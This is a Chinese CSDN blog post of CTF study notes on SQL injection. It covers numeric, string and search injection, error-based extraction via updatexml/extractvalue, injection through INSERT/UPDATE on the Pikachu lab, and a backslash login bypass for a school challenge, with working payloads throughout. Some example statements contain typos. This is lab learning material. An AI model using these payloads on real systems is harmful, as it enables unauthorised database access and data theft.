web-sql修炼笔记1

最新推荐文章于 2022-09-25 20:16:55 发布
最新推荐文章于 2022-09-25 20:16:55 发布
阅读量234 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DUOan0216/article/details/102643199
版权
注入概述

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

数据库命令
$id=_POST[$id];
select 字段名,字段名 from 表名 where 字段名='$id';
payload

注入类型可以大致分为

  • 数字型注入
  • 字符型注入
  • 搜索型注入

主要都是通过把SQL语句使其闭合,构造合法SQL,从而达到欺骗后台执行

注释有三种
'#'
-- (空格)
/**/

补充部分sql语句

show databases;
use 数据库名字;
show tables;
desc 表名;
select username,email from member where id=1;

  • 数字型注入
    通过猜解SQL语句
    大致可能是selec username,emali from member where id =1;
    这样的可以构造成
    selec username,email from member where id = 1 or 1=1;

  • 字符型注入
    通过猜解SQL语句
    大致可能是
    seclect usernaem,emali from member where username='$name';
    这样的语句要求闭合掉单引号!

  • 搜索型注入
    SQL语句大致可能为:
    select username,email from member where username like '%字符%';
    这个语句的特点是利用了 like来帮助搜索
    和字符 数字的区别只有 加了个 % ’ 而已;
    一样的payload
    select username,email from member where username= '%....%' or 1=1 #%'
    注意到后面的%'被我注释掉了
    【前面提到了 注释的 三种方法 # – /**/

一般步骤拿下数据库方法

在mysql数据库中
information_schema有mysql的详细信息
比如 在 information_schema.tables中就有
这样的 table_schematable_name两种 第一个是数据库的名字 第二个是数据库中的各个表的名字

另外 在information_schema.columns中是有
这样的 table_name column_name 前者是表名 后者是列名

我们在猜测数据库的详细信息时就可以通过上述的数据 做好payload

基于函数报错的注入

三个常用的报错函数
updatexml()、extractvalue()、floor()
在MYSQL中可以使用一些指定的函数来指定报错
// 前提: 报错不被屏蔽
updatexml() MYSQL对XML文档数据进行查询和修改的XPATH函数
extractvalue() 函数是MYSQL对XML文档数据进行查询的XPATH函数
floor() MYSQL中用来取整的函数。
payload 写法:kobe' and updatexml(1,version(),0)#

我们updatexml()函数传入的三个参数都是错的 自然它会报错
同时 我们的updatexml的第二个参数允许传递表达式
意思是 第二个参数 可以被执行

kobe' and updatexml(1,concat(0x7e,version()),0)#
concat帮助我们组成一个完整的字符串输出
同样的可以执行表达式。

基本思路也有了
即我们可以把 version()改成我们需要的sql语句。

kobe' and updatexml(1,concat(0x7e,(select username,email from pikachu.tables where username='???' limit 0,1)),0)

extractvalue()这个函数的报错处理
kobe' and extactvalue(0,concat(0x7e,version()))#

floor()取整函数 它的报错我还没弄懂…

基于update、insert的注入

其实还是利用了报错注入的方式来帮助

基本的insert、update操作

insert into 表名(字段名,字段名,字段名) values(???,???,???);

-- 它的闭合构造payload
-- 我们依靠报错来处理
insert into member(username,email) values('aaa' or updatexml(1,concat(0x7e,database()),0) or '','133254646@qq.com');
-- 我们的payload 是: aaa' or updatexml(1,concat(0x7e,(select username,email from member where username='liduoan' limit 0,1)),0) or '

-- 这样的插入来注入
-- update 一样的payload

补一道学校的题目
【一直不明白 ,问了师傅们终于知道了
在这里插入图片描述
看代码分析我们知道
在这里插入图片描述
对于stripslashes(String)我们知道这是过滤\符号的
在这里插入图片描述
htmlentities()可以过滤掉单引号或者双引号
官方解释->htmlentities()

它必然过滤掉了' 这意味着我们不可以加'
注意到SQL语句select * from users where name=\''.$username.'\' and pass=\''.$password.'\';

怎么闭合name的'号呢?
username=admin&password=…
先第一步转义之后会发现
where name=' ...' and pass='...';
如果这样呢?
where name=' ...and pass=' ...#

这样我只需要把它变成这样 name='admin \' and pass=' or 1 #
我原本一直不明白 \'被转义成'之后 这个'不应该和name='的这个'闭合在一块吗?
一直百度谷歌查…都没查出来。。。
之后问了师傅们
师傅们是这么说的转义前是一个语法结构,转义后是一个普通字符
开开心心 ,弄懂了不会的东西。

payload为: ?username=admin\&password=or 1#

李多安
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入:数字型 pikachu
qq_59607911的博客
10-15 145
查询语句:select id,email from member where username=$id mysql数据库结构在:
wechall mysql题解
为之的博客
10-17 822
19.10.17 1.Training: MySQL I(MySQL,Exploit,Training) https://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php 看了源代码,知道其sql语句为 SELECT * FROM users WHERE username='$username' AN...
SQL基础
分享不仅为了他人,同时也为了自己
11-16 4064
Select User表里面的数据如下 查询user表里面的user_name字段和user_age字段的所有数据 Select user_name,user_age from user 查询user表中所有的字段数据,用 * 表示列的名称 Select * from user 四、Distinct Distinct选取所有的值的时候不会出现重复的数据 用普通的查询,查询所有 Select * from user Select distinct u...
mysql查询
wangxunsame的博客
08-29 1722
一、查询所有 查询所有字段MySQL: select * from表名 二、查询字段 查询指定字段MySQL命令: select stuid from students; 单字段查询: select userId from表名 多字段查询: select userId,userName from表名 字段别名: select userId as ‘编号’,userName as ‘用户名’ from表名 字段别名: select userId ‘编号’,userName...
连接查询
small_py_trade的博客
09-25 285
如果两张表连接时没有任何条件限制,最后结果就是两张表的乘积,这叫笛卡儿积现象。比如一张表有三列:员工,员工编号,员工的领导编号,那么员工的领导编号就会等于领导的员工编号,需要使用内连接找到每个员工对应的领导。这就是把满足匹配的数据输出,同时把r中不满足的也一起输出,在u中对应null。因为第一个join加了左外连接,所以addressDesc会全部显示出来,导致后面roleName部分是NULL。select...from a join b on a和b的连接条件 join c on a和c的连接条件;
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
web-sql-sync
03-10
"Web-SQL-Sync" 是一个JavaScript库,主要用于在Web应用程序中实现本地数据存储的同步。这个库的目标是解决Web应用在离线状态下也能进行数据操作的问题,通过使用Web SQL数据库标准来实现。Web SQL虽然已被废弃,但...
kinda-web-sql
05-09
"kinda-web-sql-master"文件名表明这是一个项目的主分支,通常包含源代码、文档、测试和其他项目资源。如果你能够访问这个压缩包,你可能会找到以下内容: 1. **源代码**:.js文件,可能包含"kinda-web-sql"的核心...
vue+element-ui+websql
04-19
在“vue+element-ui+websql”这个项目中,开发者选择使用 Vue.js 作为基础框架来构建应用的逻辑和视图层。Vue.js 提供了双向数据绑定、虚拟DOM、指令系统等特性,使得开发者可以轻松地管理应用程序的状态和视图更新...
T-SQL阅读笔记和习题
08-17
以前只有数据库的基础和...仔细从头到尾看了这本书,感觉受益很多,所以就把笔记传上来,给大家分享。建议初学者看原书。这本书还有一个示例数据库,在网上可以下载到。可以在SQL SERVER2008上面创建,供学习时做实验。
mysql存储过程详解
weixin_44407691的博客
09-13 1020
一、定义 存储过程(Stored Procedure)是在大型数据库系统中,一组为了完成特定功能的SQL 语句集,存储在数据库中,经过第一次编译后调用不需要再次编译,用户通过指定存储过程的名字并给出参数(如果该存储过程带有参数)来执行它。存储过程是数据库中的一个重要对象。 二、存储过程的特点 1、能完成较复杂的判断和运算 2、可编程行强,灵活 3、SQL编程的代码可重复使用 4、执行的速度相对快一些 5、减少网络之间的数据传输,节省开销 三、创建一个简单的存储过程 1、创建存储过程的简单语法 create
南京邮电大学CTF题目writeup (二) 含题目地址
cainsoftware的博客
09-30 557
Pass-01 题目地址:http://nctf.nuptzj.cn/web15/ 看题目就是一个登录失败的提示"Invalid password!" 通过查看源代码 可见如下图: #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str)
SQL注入——通过注入得到已知用户名的密码
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
CTF中SQL注入常见题型整理
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到题这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
每日CTF week1
苟有恒,必有三更眠,五更起。
03-11 2352
2018.3.5 NCTF-变量覆盖 原题链接: http://ctf.nuptsast.com/challenges#%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96 分析: 看源码: &lt;?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?&gt; ...
学习基于extractvalue()和updatexml()的报错注入
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 &lt;div&gt;&lt;p&gt;&lt;a&gt;标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
作业(关于sql注入)
qq_43814486的博客
03-25 307
1·sql的注入原理: 用户输入的东西,可以是数字,字符,或者其他的什么语言会被整合到后台的服务器上进行执行,而SQL注入就是通过构造合法的语句,让这语句整合到后台服务器上执行一些违法的操作。 2.sql注入具体的案例: 数字型注入(post) $ id=$_POST['id']; $ query="select username,email from member where id= $id"...
extractvalue() updatexml()
筱阳的博客
11-25 1320
mysql updatexml extractvalue  MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML(), EXTRACTVALUE (XML_document, XPath_string);  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc  第二个参数:XPath_...
SQL SERVER实用教程 T-SQL语言.pdf
最新发布
04-17
sql server 实用教程 T-SQL语言.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值